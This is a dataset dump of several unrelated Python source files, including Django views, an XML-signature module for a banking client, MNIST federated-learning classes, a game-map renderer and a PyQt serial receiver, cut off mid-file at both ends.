reports.filter(\n\t\t\tQ(is_active=True) and\n\t\t\tQ(user__full_name__icontains=query)|\n\t\t\tQ(information__icontains=query)|\n\t\t\tQ(crime_type__icontains=query)|\n\t\t\tQ(date__startswith=query)|\n\t\t\tQ(time__regex=query)\n\t\t\t)\n\n\n\n\n\n\tif request.method == 'POST':\n\t\tif 'responded' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"RESPONDED\")\n\t\telif 'pending' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"PENDING\")\n\t\telif 'false' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"FALSE\")\n\n\t\telse:\n\t\t\tprint('None')\n\n\tpaginator \t\t\t= Paginator(reports, 10)\n\tpage \t\t\t\t= request.GET.get('page')\n\tqueryset_page \t\t= paginator.get_page(page)\n\n\ttry:\n\t \tqueryset_page \t= paginator.page(page)\n\texcept PageNotAnInteger:\n\t \tqueryset_page \t= paginator.page(1)\n\texcept EmptyPage:\n\t \tqueryset_page \t= paginator.page(paginator.num_pages)\n\n\tcontext = {\n\t\t'page_obj': queryset_page,\n\n\t}\n\treturn render(request, 'suspicious_reports/listsuspiciousreport.html', context)\n\n\n\n\n@login_required(login_url=reverse_lazy(\"accounts:login\"))\ndef detail_suspicious_reports(request, pk=None, *args, **kwargs):\n\n\treports\t= get_object_or_404(Suspicious_report, pk=pk)\n\trep_info_instance = get_object_or_404(Report_Information, pk=reports.report_info.pk)\n\tform = UpdateReportInfoForm(data=request.POST or None, instance=rep_info_instance)\n\tif request.method == 'POST':\n\t\tform = UpdateReportInfoForm(data=request.POST or None, instance=rep_info_instance)\n\t\tif 'send' in request.POST:\n\t\t\tsend_feedback \t= request.POST.get('feedback')\n\t\t\tfeedback_id\t\t= request.POST.get('id')\n\t\t\tfeed \t\t\t= Suspicious_report.objects.get(pk=feedback_id)\n\t\t\tfeed.feedback = send_feedback\n\t\t\tfeed.save()\n\t\t\tmessages.success(request,\"Feedback Sent!\")\n\t\t\treturn redirect(reverse_lazy(\"suspicious_reports:detail-reports\", kwargs={'pk':feedback_id}))\n\t\t\t\n\t\telif 'respond' in request.POST: \n\t\t\tfeedback_id\t\t= request.POST.get('id')\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\treturn redirect(reverse_lazy(\"suspicious_reports:detail-reports\", kwargs={'pk':feedback_id}))\n\n\tcontext = {\n\t'reports': reports,\n\t'form':form\n\t\n\t}\t\t\t\n\n\treturn render(request, \"suspicious_reports/detailsuspiciousreport.html\", context)\n\n\n","sub_path":"Capstone/suspicious_report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477758989","text":"\"\"\"\nConvolution functions to apply on images\n\"\"\"\n\n# main imports\nimport numpy as np\n\n\ndef convolution2D(image, kernel, kernel_size=(5, 5), stride=1):\n \"\"\"Apply 2D convolution on image using specific kernel from `ipfml.filters.kernels`\n\n Args:\n image: 2D image to apply convolution on\n kernel: specific kernel from `ipfml.filters.kernels` to use\n kernel_size: window size to use (default (5, 5))\n\n Returns:\n 2D numpy array obtained from image using kernel\n\n Example:\n\n >>> from ipfml.filters.convolution import convolution2D\n >>> from ipfml.filters.kernels import plane_mean\n >>> import numpy as np\n >>> image = np.arange(81).reshape([9, 9])\n >>> convolved_image = convolution2D(image, plane_mean, (3, 3)) \n >>> convolved_image.shape\n (7, 7)\n \"\"\"\n\n img = np.array(image)\n\n width, height = img.shape\n\n kernel_width, kernel_height = kernel_size\n\n if kernel_width % 2 == 0 or kernel_height % 2 == 0:\n raise ValueError(\"Invalid kernel size, need to be of odd size\")\n\n padding_height = (kernel_width - 1) / 2\n padding_width = (kernel_width - 1) / 2\n\n img_diff = []\n for i in range(width):\n\n if i >= padding_width and i < (width -\n padding_width) and i % stride == 0:\n\n row_diff = []\n\n for j in range(height):\n\n if j >= padding_height and j < (\n height - padding_height) and j % stride == 0:\n\n # pixel in the center of kernel window size, need to extract window from img\n window = img[int(i - padding_width):int(i + padding_width +\n 1),\n int(j -\n padding_height):int(j + padding_height +\n 1)]\n\n diff = kernel(window)\n row_diff.append(diff)\n\n img_diff.append(row_diff)\n\n return np.array(img_diff)\n","sub_path":"ipfml/filters/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635664257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n############### file info ######################################################\n#\n#\n#\n#\n#\n#\n################################################################################\n\n\nimport xbox\nif __debug__:pass\nelse:\n\timport RPi.GPIO as pi\n\n\nPWM_duty = 50 #%\n\n#Servo Left\nMS1_LeftPin\nMS2_LeftPin\nMS3_LeftPin\nDir_LeftPin\nStep_LeftPin\nEnable_LeftPin\n\n#Servo Right defs\nMS1_LeftPin\nMS2_LeftPin\nMS3_LeftPin\nDir_LeftPin\nStep_LeftPin\nEnable_LeftPin\n\n#def controls\njoystick = xbox.Joystick()\nXstick = joystick.leftX()\nYstick = joystick.leftY()\nu = ((100-abs(Xstick))*Ystick/100+Ystick)\nv = ((100-abs(Ystick))*Xstick/100+Xstick)\nrightVector = (u+v)/2\nleftVector = (u-v)/2\n\n","sub_path":"Rover1.py","file_name":"Rover1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102900840","text":"\"\"\"\nXml-signature generation and verifying functions.\n\nUsage:\nTo verify signature:\n>>> result = validate(xml_string)\n>>> if result:\n print 'Valid'\n else:\n print 'Failed to verify'\n\nTo sign xml message:\n>>> signed_xml = sign(xml_string,\"private_key.pem\",\"certificate.x509\")\n\nXml signing. http://www.w3.org/TR/xmldsig-core/\nNeeded external libraries:\n - LXML\n - PyCrypto\n - PyOpenSSL >0.12\n\"\"\"\nfrom io import StringIO, BytesIO\nimport base64\nimport hashlib\nimport logging\n\nimport Crypto.PublicKey.RSA as RSA\nimport Crypto.Hash.SHA as SHA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom lxml.builder import ElementMaker\nfrom lxml import etree\nimport OpenSSL\n\ntry:\n from bankws.certificate import check_revocation_status\nexcept ImportError:\n from certificate import check_revocation_status\n# Generate needed xml elements.\nE = ElementMaker(namespace=\"http://www.w3.org/2000/09/xmldsig#\",\n nsmap={None: \"http://www.w3.org/2000/09/xmldsig#\"})\n\nDOC = E.Signature\nSIGNEDINFO = E.SignedInfo\nCANONICALIZATIONMETHOD = E.CanonicalizationMethod\nSIGNATUREMETHOD = E.SignatureMethod\nREFERENCE = E.Reference\nTRANSFORMS = E.Transforms\nTRANSFORM = E.Transform\nDIGESTMETHOD = E.DigestMethod\nDIGESTVALUE = E.DigestValue\nSIGNATUREVALUE = E.SignatureValue\nKEYINFO = E.KeyInfo\nX509DATA = E.X509Data\nX509CERTIFICATE = E.X509Certificate\n\n\ndef validate(xml_string):\n \"\"\"\n Validates given xml string\n\n @type xml_string: string\n @param xml_string: xml string to verify\n @rtype: boolean\n @return: Result of verification.\n \"\"\"\n log = logging.getLogger(\"bankws\")\n try:\n tree = etree.fromstring(xml_string)\n except etree.XMLSyntaxError:\n log.error(\"Unable to parse xml-data.\")\n return False\n\n result = tree.xpath(\"//ds:Signature\",\n namespaces={'ds': \"http://www.w3.org/2000/09/xmldsig#\"})\n\n signature = result[0] if len(result) > 0 else None\n if signature is None:\n log.error(\"Didn't find signature field\")\n return False\n\n digestvalues = {}\n signed_info = None\n signaturevalue = None\n\n for element in signature.iter():\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}DigestValue\":\n key = element.getparent().get('URI')\n digestvalues[key] = element.text\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}SignedInfo\":\n signed_info = element\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}SignatureValue\":\n log.debug(\"{0}: {1}\".format(element.tag, element.text))\n signaturevalue = element.text\n\n # Get certificate from xml string\n certificate = get_certificate(xml_string)\n\n if certificate is None:\n log.error('Signed message but certificate is missing.')\n return False\n\n if signaturevalue is None:\n log.error(\"SignatureValue field is missing.\")\n return False\n\n if signed_info is None:\n log.error(\"SignedInfo is missing.\")\n return False\n\n # Values are base64 encoded so decode them\n certificate_data = base64.b64decode(bytes(certificate, 'utf-8'))\n signaturevalue = base64.b64decode(bytes(signaturevalue, 'utf-8'))\n\n algorithm = signed_info.xpath(\"//ds:CanonicalizationMethod[@Algorithm]\",\n namespaces={'ds': \"http://www.w3.org/2000/09/xmldsig#\"})\n\n if len(algorithm) > 0:\n comments = \"#WithComments\" in algorithm[0].get(\"Algorithm\")\n exclusive = \"xml-exc-c14n#\" in algorithm[0].get(\"Algorithm\")\n\n message = etree.tostring(signed_info)\n # Canonicalize message before calculations.\n canonicalizated_info = canonicalizate_message(str(message, 'utf-8'),\n exclusive_=exclusive,\n comments_=comments)\n\n #Calculate digests.\n for key, value in digestvalues.items():\n digest_value = \"\"\n if key == \"\": # Whole document is used\n tree.remove(signature)\n xmlstring = str(etree.tostring(tree), 'utf-8')\n digest = calculate_digest(xmlstring, exclusive, comments)\n digest_value = str(base64.b64encode(digest.digest()), 'utf-8')\n else:\n result = tree.xpath(\"//*[@wsu:Id='\" + key[1:] + \"']\",\n namespaces=tree.nsmap)\n if len(result) == 1:\n xmlstring = str(etree.tostring(result[0]), 'utf-8')\n digest = calculate_digest(xmlstring, exclusive, comments)\n digest_value = str(base64.b64encode(digest.digest()), 'utf-8')\n\n if digest_value != value:\n log.error('{0}: Digest values differ.'.format(key))\n return False\n\n try:\n if check_revocation_status(certificate_data):\n # Certificate used to sign this message is on revocation list\n return False\n except ValueError:\n log.error(\"Unsupported certificate format.\")\n return False\n\n # Generate certificate object from data found on x509data\n filetype = OpenSSL.crypto.FILETYPE_ASN1\n try:\n cert = OpenSSL.crypto.load_certificate(filetype, certificate_data)\n except OpenSSL.crypto.Error as e:\n log.exception(e)\n return False\n\n # Verify signature\n try:\n OpenSSL.crypto.verify(\n cert, signaturevalue, bytes(canonicalizated_info, 'utf-8'), 'sha1'\n )\n except OpenSSL.crypto.Error as e:\n log.exception(e)\n return False\n\n return True\n\n\ndef sign(xml_string, private_key, certificate, xml_declaration_=False):\n \"\"\"\n Signs xml message with dsig algorithm.\n\n @type xml_string: string\n @param xml_string: Xml text to sign\n @type private_key: string\n @param private_key: Name of the file containing private key.\n @type certificate: string\n @param certificate: Name of the file containing X509v3 certificate.\n @type xml_declaration_: boolean\n @param xml_declaration: Add xml declaration to xml string.\n @rtype: string\n @return: Xml string signed with private key.\n @raise IOError: In case of failing open private key or certificate file.\n @raise ValueError: In case of private key being in unsupported format.\n \"\"\"\n # Test that xml can be parsed.\n try:\n e = etree.fromstring(xml_string)\n except etree.XMLSyntaxError:\n raise RuntimeError(\"Malformatted xml string\")\n xml_string = str(etree.tostring(e), 'utf-8')\n signature = generate_xml_signature(xml_string, private_key, certificate)\n e.append(signature)\n return etree.tostring(e,\n xml_declaration=xml_declaration_,\n encoding=\"UTF-8\",\n pretty_print=False)\n\n\ndef get_certificate(xml_string):\n \"\"\"\n Gets certificate from xml_string.\n\n @type xml_string: bytes\n @param xml_string: XML-string containing certificate data.\n @rtype: string\n @return: Base64 encoded Certificate data or\n None if certificate is not found.\n \"\"\"\n WSSE = (\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss\"\n \"-wssecurity-secext-1.0.xsd\")\n DSIG = \"http://www.w3.org/2000/09/xmldsig#\"\n\n tree = etree.fromstring(xml_string)\n keyinfo = tree.xpath(\"//ds:KeyInfo\",\n namespaces={'ds': DSIG})\n if len(keyinfo) > 0:\n reference = keyinfo[0].xpath(\"//wsse:Reference\",\n namespaces={'wsse': WSSE})\n if len(reference) > 0:\n # Certificate is in BinarySecurityToken element.\n bst = tree.xpath(\"//wsse:BinarySecurityToken\",\n namespaces=tree.nsmap)\n if len(bst) > 0:\n return bst[0].text\n else:\n # Certificate is in X509Certificate element\n certificate = keyinfo[0].xpath(\"//ds:X509Certificate\",\n namespaces={'ds': DSIG})\n if len(certificate) > 0:\n return certificate[0].text\n return None\n\n\ndef canonicalizate_message(xml_string, exclusive_=False, comments_=False):\n \"\"\" Canonicalizates given xml_string\n\n @type xml_string: string\n @param xml_string: Xml string to canonicalizate\n @type exclusive_: boolean\n @param exclusive_: Use exclusive canonicalization\n @type comments_: boolean\n @param comments_: Use with_comments mode in canonicalization.\n @rtype: string\n @return: Canonicalizated version of xml_string\n \"\"\"\n file_object = StringIO(xml_string) # Generate file like object from string\n tree = etree.parse(file_object)\n file_object = BytesIO() # Empty file object to write canonicalizated xml\n tree.write_c14n(file_object, with_comments=comments_, exclusive=exclusive_)\n message = str(file_object.getvalue(), 'utf-8')\n return message\n\n\ndef calculate_digest(xml_string, exclusive_=False, comments_=False):\n \"\"\"\n Calculates message digest for signing\n\n @type xml_string: string\n @param xml_string: Xml text\n @rtype: L{Digest}\n @return: sha-1 digest of the message\n \"\"\"\n message = canonicalizate_message(xml_string, exclusive_, comments_)\n digest = hashlib.sha1(bytes(message, 'utf-8'))\n return digest\n\n\ndef calculate_signature_value(xml_string, private_key, exclusive_=False,\n comments_=False):\n \"\"\"\n Calculates rsa-sha1 signaturevalue for signed xml\n\n @type xml_string: bytes or string\n @param xml_string: Signed info element as a string.\n @type private_key: string\n @param private_key: Private RSA-key filename\n @type exclusive_: boolean\n @param exclusive_: Use exclusive canonicalization\n @type comments_: boolean\n @param comments_: Use with_comments-style canonicalization.\n @raise IOError: If the private key can't be read from file.\n @raise ValueError: If PyCrypto can't import RSA-key\n @rtype: string\n @return: Calculated signaturevalue as a raw string.\n \"\"\"\n log = logging.getLogger('bankws')\n canonicalizated_info = canonicalizate_message(xml_string,\n exclusive_,\n comments_)\n\n try:\n with open(private_key, 'rb') as f:\n content = f.read()\n except EnvironmentError as e:\n log.exception(e)\n raise IOError(\"Failed to open file {0}\".format(private_key))\n\n try:\n pkey = RSA.importKey(content)\n except ValueError as e:\n log.exception(e)\n raise\n\n info_digest = SHA.new(canonicalizated_info.encode('utf-8'))\n signer = PKCS1_v1_5.new(pkey)\n signaturevalue = signer.sign(info_digest)\n return signaturevalue\n\n\ndef generate_xml_signature(xml_string, private_key, X509certificate):\n \"\"\" Generates xml signature\n\n @type xml_string: String\n @param xml_string: String to sign\n @type X509certificate: string\n @param X509certificate: Certificate filename\n @type private_key: string\n @param private_key: RSA private key filename\n @raise IOError: In case of failing open private key or certificate file.\n @raise ValueError: In case of private key being in unsupported format.\n @rtype: L{lxml.etree._Element}\n @return: Signature element.\n \"\"\"\n log = logging.getLogger('bankws')\n log.info(\"Generating signature.\")\n # Canonicalization algorithms\n C14NWITHCOMMENTS = (\"http://www.w3.org/TR/2001/REC-xml-c14n-20010315\"\n \"#WithComments\")\n # Signature algorithms\n RSASHA1 = \"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"\n # Transform algorithms\n ENVELOPED = \"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"\n # Digest algorithms\n SHA1 = \"http://www.w3.org/2000/09/xmldsig#sha1\"\n digest = calculate_digest(xml_string, comments_=True)\n info = \\\n SIGNEDINFO(\n CANONICALIZATIONMETHOD(Algorithm=C14NWITHCOMMENTS),\n SIGNATUREMETHOD(Algorithm=RSASHA1),\n REFERENCE(\n TRANSFORMS(\n TRANSFORM(Algorithm=ENVELOPED)\n ),\n DIGESTMETHOD(Algorithm=SHA1),\n DIGESTVALUE(str(base64.b64encode(digest.digest()), 'utf-8')),\n URI=\"\"\n ),\n )\n\n tree = etree.fromstring(xml_string)\n # Append info to original xml string so info element gets correct\n # namespace declarations.\n tree.append(info)\n\n info_message = str(etree.tostring(info), 'utf-8')\n log.debug(\"Signature Info part: {0}\".format(info_message))\n signaturevalue = calculate_signature_value(info_message,\n private_key,\n comments_=True)\n\n try:\n with open(X509certificate, 'rb') as f:\n content = f.read()\n except EnvironmentError as e:\n log.exception(e)\n raise IOError(\"Failed to open file {0}\".format(X509certificate))\n\n signature = \\\n DOC(\n SIGNATUREVALUE(str(base64.b64encode(signaturevalue), 'utf-8')),\n KEYINFO(\n X509DATA(\n X509CERTIFICATE(str(base64.b64encode(content), 'utf8'))\n )\n )\n )\n\n signature.insert(0, info)\n return signature\n","sub_path":"bankws/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594243113","text":"import os\nfrom datetime import datetime, timedelta\n\n\nclass Logging(object):\n '''\n logging class will help to create, write and print logs in different\n env.\n '''\n\n def __init__(self):\n self.debug = True\n try:\n if os.environ[\"ENV\"] == \"PROD\":\n self.debug = False\n except Exception as e:\n print(\"---- no env-type found [{}] ---- \".format(e))\n print(\"Running in default debug mode........\")\n\n def log(self, level, msg):\n # This contains the local timezone\n stamp = datetime.now()\n\n log = \"{}: {}: {}\".format(stamp.replace(microsecond=0) + timedelta(hours=3), level, msg)\n\n if self.debug or level == \"debug\":\n print(log)\n else:\n fileFormat = \"txt\"\n if level == \"error\":\n fileFormat = \"error\"\n\n date = stamp.date()\n filelocation = \"./log_utility/logs/log_{}.{}\".format(date, fileFormat)\n self.write_log(filelocation, log)\n return None\n\n def write_log(self, filelocation, log):\n try:\n with open(filelocation, \"a+\") as logging_file:\n logging_file.write(log + '\\n')\n except Exception as e:\n print(\"Error in logging [{}]\".format(e))\n\n return None","sub_path":"log_utility/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326234241","text":"\"\"\"\nSnake class.\n\n\"\"\"\nfrom .vector import Vector\n\n\nclass Snake:\n def __init__(self, snake_id, name, x, y, length, color, direction, speed, acceleration):\n self.snake_id = snake_id\n self.name = name\n self.color = color\n self.speed = speed\n self.haste = False\n self.acceleration = acceleration\n self.direction = Vector(direction['x'], direction['y'])\n self.length = length\n self.add_length = 0\n\n self.vectors = list()\n\n head = Vector(x, y)\n self.vectors.append(head)\n self.vectors.append(head.subtract(self.direction.scale(self.length)))\n\n def update(self, direction, vectors):\n self.direction = Vector(direction['x'], direction['y'])\n self.vectors = list()\n for vector in vectors:\n self.vectors.append(Vector(vector['x'], vector['y']))\n","sub_path":"snakegame/client/views/game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"652368301","text":"import torch\nfrom torch import nn\nfrom torch.nn.functional import relu, softmax\n\nfrom models.csBase import ClientBase, ServerBase\n\n\nclass MnistModel(nn.Module):\n def __init__(self):\n super(MnistModel, self).__init__()\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n\n def forward(self, x):\n x = self.fc1(x)\n x = relu(x)\n x = self.fc2(x)\n x = softmax(x, dim=1)\n return x\n\n\nclass Client(ClientBase):\n def __init__(self, client_name, train_loader, test_loader, start_epoch=0, checkpoint_path='./', device='cpu',\n best_acc=0):\n super(Client, self).__init__(client_name, train_loader, test_loader,\n start_epoch=start_epoch, checkpoint_path=checkpoint_path, device=device)\n self.model = MnistModel().to(device)\n # self.criterion = FocalLoss(2)\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=0.002, momentum=0.9)\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=0.995, last_epoch=start_epoch - 1)\n self.best_acc = best_acc\n\n def run(self, n_epochs, save_last=False):\n train_loader = self.train_loader\n model = self.model\n criterion = self.criterion\n optimizer = self.optimizer\n scheduler = self.scheduler\n device = self.device\n\n total_loss = 0.0\n total_acc = 0.0\n\n model.train()\n\n for epoch in range(n_epochs):\n total = 0\n correct = 0\n running_loss = 0.0\n for batch_idx, (inputs, labels) in enumerate(train_loader):\n inputs = inputs.float().to(device)\n labels = labels.long().to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n _, pred = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n total += inputs.size(0)\n correct += torch.sum(pred == labels.data).item()\n running_loss += loss.item() * inputs.size(0)\n scheduler.step()\n epoch_loss = running_loss / total\n epoch_acc = correct / total\n\n print('{} Train | Epoch={:d} | Loss={:.4f} | Acc={:.4f}'.format(self.name, self.cur_epoch,\n epoch_loss, epoch_acc))\n\n self.cur_epoch += 1\n total_loss += epoch_loss\n total_acc += epoch_acc\n\n if save_last:\n self.save(suffix='_last')\n\n self.history['acc'].append(total_acc / n_epochs)\n self.history['loss'].append(total_loss / n_epochs)\n\n def test(self, save_best=False):\n test_loader = self.test_loader\n model = self.model\n criterion = self.criterion\n device = self.device\n\n total = 0\n correct = 0\n running_loss = 0.0\n\n model.eval()\n\n with torch.no_grad():\n for (inputs, labels) in test_loader:\n inputs = inputs.float().to(device)\n labels = labels.long().to(device)\n outputs = model(inputs)\n _, pred = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n total += inputs.size(0)\n correct += torch.sum(pred == labels.data).item()\n running_loss += loss.item() * inputs.size(0)\n\n total_loss = running_loss / total\n total_acc = correct / total\n\n print(\n '{} Test | Epoch={:d} | Loss={:.4f} | Acc={:.4f}'.format(self.name, self.cur_epoch - 1,\n total_loss, total_acc))\n\n if self.best_acc < total_acc:\n print('Achieve best accuracy: {}'.format(total_acc))\n self.best_acc = total_acc\n if save_best:\n self.save(suffix='_best')\n\n self.history['val_acc'].append(total_acc)\n self.history['val_loss'].append(total_loss)\n\n\nclass Server(ServerBase):\n def __init__(self, start_round=0, checkpoint_path='./', device='cpu'):\n super(Server, self).__init__(start_round=start_round, checkpoint_path=checkpoint_path,\n device=device)\n self.model = MnistModel().to(device)\n self.criterion = nn.CrossEntropyLoss()\n","sub_path":"models/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535102719","text":"from ..render import RenderStep\nfrom ..color import get_color\nfrom ..utils import convert_position_to_point\n\nfrom collections import defaultdict\n\nclass RegionsStep(RenderStep):\n\n def __init__(self):\n super().__init__(\"borders\")\n\n def run(self, ctx, config):\n vor = ctx.data[config[\"input\"]]\n\n edge_systems = defaultdict(list)\n\n for region in vor.regions:\n vertices = region.vertices\n edges = [tuple(sorted([vertices[i], vertices[i+1]])) for i in range(-1, len(vertices)-1)]\n for edge in edges:\n edge_systems[edge].append(region.system)\n \n width = config[\"width\"]\n fill = get_color(ctx, config[\"fill\"])\n\n for (edge, systems) in edge_systems.items():\n\n owners = set()\n for system in systems:\n if system.starbase:\n owners.add(system.starbase.owner)\n else:\n owners.add(None)\n\n is_rim_controlled = len(systems) == 1 and None not in owners\n is_border = 1 < len(owners)\n\n if is_border or is_rim_controlled:\n points = [convert_position_to_point(ctx, v) for v in edge]\n ctx.draw.line(points, fill=fill, width=width)\n self._draw_circle(ctx.draw, points[0], fill, width/2)\n self._draw_circle(ctx.draw, points[1], fill, width/2)\n \n def _draw_circle(self, draw, center, fill, radius):\n points = (\n center[0] - radius + 1,\n center[1] - radius + 1,\n center[0] + radius - 1,\n center[1] + radius - 1\n )\n draw.ellipse(points, fill=fill)\n","sub_path":"stellaris/render/step/borders.py","file_name":"borders.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273547482","text":"import tensorflow as tf\n\n\ndef compute_entropy(probability, axis, epsilon=1e-7):\n '''\n Args:\n probability:\n axis:\n epsilon:\n Returns:\n entropy\n '''\n is_zero = probability == 0\n has_zero = tf.math.reduce_any(is_zero)\n if has_zero:\n mask = epsilon * tf.ones_like(probability)\n masked_probability = tf.where(is_zero, mask, probability)\n log_probability = tf.math.log(masked_probability)\n else:\n log_probability = tf.math.log(probability)\n\n # entropy\n entropy = -tf.reduce_sum(probability * log_probability, axis=axis)\n return entropy\n\n\ndef compute_variation_ratio(prob_samples):\n '''\n Referenced 3.3.1 of following thesis.\n Y. Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n variation_ratio: [batch_size]\n '''\n num_samples = len(prob_samples)\n\n max_probs = tf.reduce_max(prob_samples, axis=2, keepdims=True)\n is_mode = tf.dtypes.cast(prob_samples == max_probs, prob_samples.dtype)\n\n # for multi-modal\n num_mode = tf.reduce_sum(is_mode, axis=2, keepdims=True)\n is_mode = is_mode / num_mode\n\n frequency = tf.reduce_sum(is_mode, axis=0)\n mode_frequency = tf.reduce_max(frequency, axis=1)\n return 1 - (mode_frequency / num_samples)\n\n\ndef compute_predictive_entropy(prob_samples, eps=1e-12):\n '''\n Referenced 3.3.1 of following thesis.\n Y. Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n predictive_entropy: [batch_size]\n '''\n pred_prob = tf.reduce_mean(prob_samples, axis=0)\n return compute_entropy(pred_prob, axis=1)\n\n\ndef compute_expected_entropy(prob_samples):\n '''\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n '''\n entropy_samples = compute_entropy(prob_samples, axis=2)\n return tf.reduce_mean(entropy_samples, axis=0)\n\n\ndef compute_mutual_information(prob_samples, eps=1e-12):\n '''\n Referenced 3.3.1 of following thesis.\n Y. Gal, \"Uncertainty in Deep Learning\", University of Cambridge (2016)\n\n Args:\n prob_samples: [num_samples, batch_size, num_classes]\n Returns:\n mutual_information: [batch_size, ]\n '''\n predictive_entropy = compute_predictive_entropy(prob_samples)\n expected_entropy = compute_expected_entropy(prob_samples)\n return predictive_entropy - expected_entropy\n","sub_path":"extended_tfp/uncertainty.py","file_name":"uncertainty.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644313372","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'infoboxes'\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^add/box/$', views.add, name='add'),\n url(r'^add/tag/$', views.add_tag, name='add_tag'),\n url(r'^graph/$', views.GraphView.as_view(), name='graph'),\n]\n","sub_path":"infoboxes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"425590851","text":"\nimport socket\nimport threading\nfrom server import Server\nfrom client import Client\n\nUDP_IP = 5000\n\nmy_server = Server()\n\nthreading1 = threading.Thread(target=my_server.listen)\nthreading1.daemon = True\nthreading1.start()\n\n# User input\nwhile True:\n try:\n \tcommand = input(\"> \")\n except KeyboardInterrupt:\n \tprint(\"quitting\")\n \tquit()\n # Sends a message to every other server\n args = command.split()\n if args[0] == 'sendall':\n data = dict()\n data['msg_type'] = 'TEST'\n data['message'] = 'hi'\n my_server.sendall(data)\n elif args[0] == 'broadcast':\n \tmy_server.broadcastmessages()\n ### MESSAGING COMMANDS ###\n # postmessage \n elif args[0] == 'postmessage' or args[0] == 'pm':\n client_id = args[1]\n reputation = int(args[2])\n message = ' '.join(args[3:])\n my_server.postmessage(client_id, reputation, message)\n elif args[0] == 'dumpmessages':\n my_server.dumpmessages()\n ### VOTING COMMANDS ###\n # upvote/downvote \n elif args[0] == 'upvote':\n client_id = args[1]\n message_id = args[2]\n my_server.vote(client_id, message_id, 1)\n elif args[0] == 'downvote':\n client_id = args[1]\n message_id = args[2]\n my_server.vote(client_id, message_id, -1)\n elif args[0] == 'newclient':\n my_server.newclient()\n","sub_path":"anonrep.py","file_name":"anonrep.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226377952","text":"import sys\r\nfrom PyQt5 import QtCore, QtWidgets, uic\r\nfrom serial import Serial, SerialException\r\n\r\nqtCreatorFile = r\"C:\\Users\\User\\My Files\\Shark-O-Meter\\GUI\\sharkogui.ui\"\r\n\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass SerialReceiver(QtCore.QThread):\r\n signal = QtCore.pyqtSignal('PyQt_PyObject')\r\n serial = None\r\n\r\n def __init__(self, port, baudrate, timeout):\r\n self.port = port\r\n self.baudrate = baudrate\r\n self.timeout = timeout\r\n QtCore.QThread.__init__(self)\r\n self.serial = Serial(self.port, baudrate=self.baudrate, timeout=self.timeout)\r\n\r\n def __del__(self):\r\n self.wait()\r\n\r\n def isConnected(self):\r\n return self.connected\r\n\r\n def run(self):\r\n try:\r\n while self.serial.is_open:\r\n self.connected = True\r\n ser_bytes = self.serial.readline()\r\n decoded_bytes = ser_bytes[0:len(ser_bytes)-2].decode(\"utf-8\")\r\n self.signal.emit(decoded_bytes)\r\n self.serial.close()\r\n except SerialException:\r\n print(\"Connection Lost.\")\r\n\r\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\r\n path_to_file = None\r\n\r\n def __init__(self):\r\n QtWidgets.QMainWindow.__init__(self)\r\n Ui_MainWindow.__init__(self)\r\n self.setupUi(self)\r\n\r\n self.connectButton.clicked.connect(self.connectionToggle)\r\n\r\n 